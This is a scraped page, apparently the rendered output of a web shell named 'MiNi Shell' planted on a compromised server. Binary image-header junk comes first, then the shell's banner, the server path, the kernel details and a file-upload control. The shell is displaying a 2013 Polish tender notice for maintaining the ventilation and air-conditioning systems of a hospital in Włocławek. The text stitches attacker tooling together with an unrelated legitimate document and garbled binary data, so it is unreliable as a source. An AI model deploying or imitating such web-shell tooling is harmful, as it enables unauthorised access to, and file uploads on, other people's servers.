JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130320/110508-N-2013.html

<p class="kh_header"><b>Włocławek: DIZ - 7- 2013 Utrzymanie w stałej sprawności technicznej oraz konserwację
i serwis (usuwanie usterek, awarii i uszkodzeń) instalacji klimatyzacyjnych i wentylacyjnych użytkowanych przez Szpital Wojewódzki we Włocławku.</b><br>
<b>Numer ogłoszenia: 110508 - 2013; data zamieszczenia: 20.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ - 7- 2013 Utrzymanie w stałej sprawności technicznej oraz konserwację
i serwis (usuwanie usterek, awarii i uszkodzeń) instalacji klimatyzacyjnych i wentylacyjnych użytkowanych przez Szpital Wojewódzki we Włocławku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup usługi serwisowej na wykonywanie konserwacji oraz serwisu (usuwanie usterek, awarii i uszkodzeń) systemów klimatyzacji i wentylacji zamontowanych w Szpitalu Wojewódzkim we Włocławku. Czynności te dotyczą:

Instalacji wentylacyjno- klimatyzacyjnych  - 19 sztuk,
Klimatyzatorów typu Split i Compact  - 44 sztuk.
Naprawy, przeglądy i konserwacje instalacji klimatyzacyjnych obejmują czynności określone przez producentów poszczególnych instalacji oraz obowiązujące w tym zakresie przepisy i powinny być wykonywane na bieżąco jednak nie rzadziej niż raz na kwartał.  



Wykonawca zapewni:

Stały nadzór serwisowy w okresie obowiązywania Umowy. Przez stały nadzór serwisowy należy rozumieć zapewnienie przez 7 dni w tygodniu całodobowego przyjmowania zgłoszeń awarii, usterek oraz skuteczne ich usuwanie i przywracanie sprawności technicznej instalacji. 
Rozpoczęcie napraw zgłoszonych awarii i usterek w nieprzekraczalnym terminie 24 godzin, a sal operacyjnych do 6 godzin od czasu zgłoszenia i  ich zakończenie w ciągu 24 godzin.
W przypadku naprawy wymagającej sprowadzenia brakujących części, decyduje data otrzymania części plus 24 godziny.
Materiały niezbędne do wykonywania planowych przeglądów na własny koszt.
Odpłatnie dostawę materiałów eksploatacyjnych potrzebnych do usuwania awarii.
Dojazd serwisu na własny koszt.
Przejęcie napraw gwarancyjnych na instalacje i urządzenia, które takową gwarancję posiadają.
Sporządzi każdorazowo protokół z przeprowadzonych czynności.








                    
Szczegółowy opis przedmiotu zamówienia: 



Zakres prac konserwacyjnych centrali klimatyzacyjnych   
    i wentylacyjnych oraz osprzętu.

Przegląd i konserwacja instalacji klimatyzacyjnych obejmuje czynności określone przez producentów poszczególnych instalacji oraz obowiązujące w tym zakresie przepisy. Zakres prac obejmuje między innymi:
Czyszczenie i wymiana filtrów powietrza,
Czyszczenie filtrów wody grzewczej,
Czyszczenie wnętrza central wentylacyjnych wraz z ich odgrzybieniem i dezynfekcją  całego układu klimatyzacyjnego - 2 razy w roku,
Naciąg pasków klinowych silników,
Kontrola stanu izolacji silników i przewodów elektrycznych,
Czyszczenie i kontrola pracy wentylatorów wyciągowych,
Czyszczenie tłumików kanałowych w instalacji wentylacyjnej,
Sprawdzenie, regulacja i nadzór nad systemem automatyki wentylacyjnej
( regulacja, zmiana nastaw letnich oraz zimowych ),
Regulacja ciśnienia czynnika chłodzącego i jeśli zachodzi taka potrzeba dopełnianie czynnikiem chłodniczym, 
Sprawdzenie szczelności połączeń,
Konserwacja i przeglądy serwisowe pomp obiegowych,
Sprawdzenie poprawności działania całej instalacji.
Sporządzanie protokołów z przeglądów z wyspecyfikowaniem ewentualnych materiałów koniecznych do wykonania napraw.


Zakres prac dotyczący systemów wentylacji:


Przegląd i czyszczenie centrali wentylacyjnej.
Kontrola i ewentualna wymiana pasków klinowych wentylatorów.
Pomiar prądu znamionowego  silników wentylatorów.
Kontrola, sprawdzenie i regulacja elementów wentylacyjnych takich jak zawory regulacyjne, przepustnice, regulatory przepływu oraz nawiewniki laminarne.
Sprawdzenie posadowienia centrali wentylacyjnej.
Kontrola uziemienia centrali oraz konstrukcji nośnej.
Kontrola oraz ewentualna wymiana filtrów powietrza zgrubnych, dokładnych oraz absolutnych.





Zakres prac dotyczący systemów klimatyzacji oraz systemów nawilżania i odwilżania powietrza nawiewanego:



Sprawdzenie temperatur w pomieszczeniach klimatyzowanych.
Sprawdzenie poprawności działania urządzeń oraz szczelności połączeń.
Regulacja parametrów urządzeń w sprężarkach, kontrola poziomu i stanu zużycia oraz uzupełnienie oleju w sprężarkach, smarowanie łożysk, sprawdzenie ciśnienia czynnika chłodniczego, uzupełnienie czynnika chłodniczego, kontrola zawilgocenia czynnikiem chłodniczym.
Oczyszczenie a w razie potrzeby umycie powierzchni skraplaczy i parowników.
Kontrola ciśnienia skraplania i parowania z regulacją zaworów rozprężnych.
Sprawdzenie i udrożnienie odpływów skroplin.
Sprawdzenie nastaw presostatów, termostatów i sterowników oszraniania
Regulacja nastaw przepustnic w urządzeniach klimatyzacyjnych, nawiewników i wywiewników.
Sprawdzenie wentylatora urządzenia zewnętrznego.
Sprawdzenie kompresora.
Czyszczenie filtra urządzenia wewnętrznego.
Czyszczenie urządzenia zewnętrznego.
Sprawdzenie zamocowania urządzeń.
Sprawdzenie urządzeń sterujących i pomiarowych klimatyzatorów.
Sprawdzenie zabezpieczeń termicznych i elektrycznych instalacji sterującej urządzeń klimatyzacyjnych.
Sprawdzenie poprawności zasilania energią elektryczną, pomiary prądów pobieranych przez odbiorniki, ewentualna wymiana bezpieczników.
Sprawdzenie działania zabezpieczeń elektronicznych.
Naprawy przywracające sprawność urządzeń.


Przedmiotem zamówienia jest zakup usługi serwisowej na wykonywanie konserwacji oraz serwisu (usuwanie usterek, awarii i uszkodzeń) systemów klimatyzacji i wentylacji zamontowanych w Szpitalu Wojewódzkim we Włocławku. Czynności te dotyczą:

Instalacji wentylacyjno- klimatyzacyjnych  - 19 sztuk,
Klimatyzatorów typu Split i Compact  - 44 sztuk.
Naprawy, przeglądy i konserwacje instalacji klimatyzacyjnych obejmują czynności określone przez producentów poszczególnych instalacji oraz obowiązujące w tym zakresie przepisy i powinny być wykonywane na bieżąco jednak nie rzadziej niż raz na kwartał.  

                    
Szczegółowy opis przedmiotu zamówienia: 



Zakres prac konserwacyjnych centrali klimatyzacyjnych   
    i wentylacyjnych oraz osprzętu.

Przegląd i konserwacja instalacji klimatyzacyjnych obejmuje czynności określone przez producentów poszczególnych instalacji oraz obowiązujące w tym zakresie przepisy. Zakres prac obejmuje między innymi:
Czyszczenie i wymiana filtrów powietrza,
Czyszczenie filtrów wody grzewczej,
Czyszczenie wnętrza central wentylacyjnych wraz z ich odgrzybieniem i dezynfekcją  całego układu klimatyzacyjnego - 2 razy w roku,
Naciąg pasków klinowych silników,
Kontrola stanu izolacji silników i przewodów elektrycznych,
Czyszczenie i kontrola pracy wentylatorów wyciągowych,
Czyszczenie tłumików kanałowych w instalacji wentylacyjnej,
Sprawdzenie, regulacja i nadzór nad systemem automatyki wentylacyjnej
( regulacja, zmiana nastaw letnich oraz zimowych ),
Regulacja ciśnienia czynnika chłodzącego i jeśli zachodzi taka potrzeba dopełnianie czynnikiem chłodniczym, 
Sprawdzenie szczelności połączeń,
Konserwacja i przeglądy serwisowe pomp obiegowych,
Sprawdzenie poprawności działania całej instalacji.
Sporządzanie protokołów z przeglądów z wyspecyfikowaniem ewentualnych materiałów koniecznych do wykonania napraw.


Zakres prac dotyczący systemów wentylacji:


Przegląd i czyszczenie centrali wentylacyjnej.
Kontrola i ewentualna wymiana pasków klinowych wentylatorów.
Pomiar prądu znamionowego  silników wentylatorów.
Kontrola, sprawdzenie i regulacja elementów wentylacyjnych takich jak zawory regulacyjne, przepustnice, regulatory przepływu oraz nawiewniki laminarne.
Sprawdzenie posadowienia centrali wentylacyjnej.
Kontrola uziemienia centrali oraz konstrukcji nośnej.
Kontrola oraz ewentualna wymiana filtrów powietrza zgrubnych, dokładnych oraz absolutnych.





Zakres prac dotyczący systemów klimatyzacji oraz systemów nawilżania i odwilżania powietrza nawiewanego:



Sprawdzenie temperatur w pomieszczeniach klimatyzowanych.
Sprawdzenie poprawności działania urządzeń oraz szczelności połączeń.
Regulacja parametrów urządzeń w sprężarkach, kontrola poziomu i stanu zużycia oraz uzupełnienie oleju w sprężarkach, smarowanie łożysk, sprawdzenie ciśnienia czynnika chłodniczego, uzupełnienie czynnika chłodniczego, kontrola zawilgocenia czynnikiem chłodniczym.
Oczyszczenie a w razie potrzeby umycie powierzchni skraplaczy i parowników.
Kontrola ciśnienia skraplania i parowania z regulacją zaworów rozprężnych.
Sprawdzenie i udrożnienie odpływów skroplin.
Sprawdzenie nastaw presostatów, termostatów i sterowników oszraniania
Regulacja nastaw przepustnic w urządzeniach klimatyzacyjnych, nawiewników i wywiewników.
Sprawdzenie wentylatora urządzenia zewnętrznego.
Sprawdzenie kompresora.
Czyszczenie filtra urządzenia wewnętrznego.
Czyszczenie urządzenia zewnętrznego.
Sprawdzenie zamocowania urządzeń.
Sprawdzenie urządzeń sterujących i pomiarowych klimatyzatorów.
Sprawdzenie zabezpieczeń termicznych i elektrycznych instalacji sterującej urządzeń klimatyzacyjnych.
Sprawdzenie poprawności zasilania energią elektryczną, pomiary prądów pobieranych przez odbiorniki, ewentualna wymiana bezpieczników.
Sprawdzenie działania zabezpieczeń elektronicznych.
Naprawy przywracające sprawność urządzeń..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających
    o których mowa w art. 67 ust. 1 pkt 6 i 7 lub art. 134 ust. 6 pkt 3 i 4 do 
    20 procent wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawcy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej 1 usługę  polegającą na utrzymaniu w stałej sprawności technicznej oraz konserwację i serwis (usuwanie usterek, awarii i uszkodzeń) instalacji klimatyzacyjnych i wentylacyjnych, o wartości minimum 50 000,00 zł w ramach jednego kontraktu. Zamawiający stwierdzi to na podstawie dołączonego do oferty wykazu usług;
2. posiadają uprawnienia w zakresie kwalifikacji elektrycznych do 1 kV    
      zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki   
      Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad   
      stwierdzania posiadania kwalifikacji przez osoby zajmujące się 
      eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003  r. Nr 89, poz. 528 
      ze zm.)
3. posiadają uprawnienia  w zakresie  naprawy i obsługi technicznej   
      urządzeń i instalacji chłodniczej zawierających substancje kontrolowane  
      oraz dokonujących obrotu tymi substancjami uzyskane na mocy ustawy z  
      dnia 20 kwietnia 2004 r. o substancjach zubożających warstwę ozonową  
      (Dz. U. z 2004 r. Nr 1212, poz. 1263 ze zm.) - dla co najmniej 1 osoby  
       wykonującej prace.


Zamawiający dokona oceny spełnienia warunków  na podstawie złożonych wraz z ofertą oświadczeń  dokumentów i wykazów.Warunek zostanie oceniony metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca posiada zdolność kredytową lub środki własne w      wysokości 50 000,00 zł (Wykonawca złoży stosowne oświadczenie)
2. Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę  gwarancyjną min. 50 000,00 zł w zakresie odpowiedzialności
 cywilnej - kontraktowej i deliktowej, obejmującej działalność zgodną z   przedmiotem niniejszej umowy.
3.W przypadku polegania na wiedzy i doświadczeniu, potencjale   
   technicznym, osobach zdolnych do wykonania zamówienia lub   
   zdolnościach finansowych innych podmiotów, Wykonawca zobowiązany  
   jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
   niezbędnymi do realizacji zamówienia, w szczególności  
   przedstawiając w tym celu pisemne zobowiązanie tych podmiotów  
   do oddania mu do dyspozycji niezbędnych zasobów na okres  
   korzystania z nich przy wykonaniu zamówienia.

Zamawiający dokona oceny spełnienia warunków  na podstawie złożonych wraz z ofertą oświadczeń  dokumentów i wykazów.Warunek zostanie oceniony metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - świadectwo kwalifikacji w zakresie  naprawy i obsługi technicznej  urządzeń i instalacji chłodniczej zawierających substancje kontrolowane oraz dokonujących obrotu tymi substancjami uzyskane na mocy ustawy z dnia 20 kwietnia 2004 r. o substancjach zubożających warstwę ozonową  (Dz. U. z 2004 r. Nr 1212, poz. 1263 ze zm.) - dla co najmniej 1 osoby  wykonującej prace. 
2.Oświadczenia o spełnieniu warunków udziału w postępowaniu na druku, który stanowi załącznik nr 2 do niniejszej SIWZ,
3.Pisemne zobowiązanie innych podmiotów do udostępnienia  osób i przedmiotów  zdolnych do wykonania zamówienia, zgodnie z warunkiem określonym w Rozdziale V, pkt. 5.1 ppkt. III, jeżeli Wykonawca wskaże inne podmioty. 
4.Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że nie należy do grupy kapitałowej.
5.Wypełniony i podpisany Druk ofertowy , zgodnie z Załącznikiem nr 1 do niniejszej specyfikacji;   
6.Zaakceptowany i podpisany Załącznik nr 4a, 4b, 4c do niniejszej   specyfikacji;
7.Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów  rejestracyjnych)  w przypadku podpisywania oferty przez  osobę nie wpisaną do dokumentów rejestracyjnych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w postaci aneksu w przypadku kiedy zmiana ta będzie korzystna dla zamawiającego lub gdyby zamawiający miał ponieść niewspółmierną stratę przez zaniechanie zmiany. Zamawiający również zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (w formie aneksu), w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 

   a.  zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu     
        umowy; 
   b.  ustawowa zmiana obowiązującej stawki podatku od towarów i usług (VAT). 

Wszystkie powyższe postanowienia w podpunktach stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki
                        ul. Wieniecka 49
                        87 - 800 Włocławek
                       budynek administracji, pokój nr 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2013 godzina 10:00, miejsce: Szpital Wojewódzki
                        ul. Wieniecka 49
                        87 - 800 Włocławek
                       budynek administracji, pokój nr 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com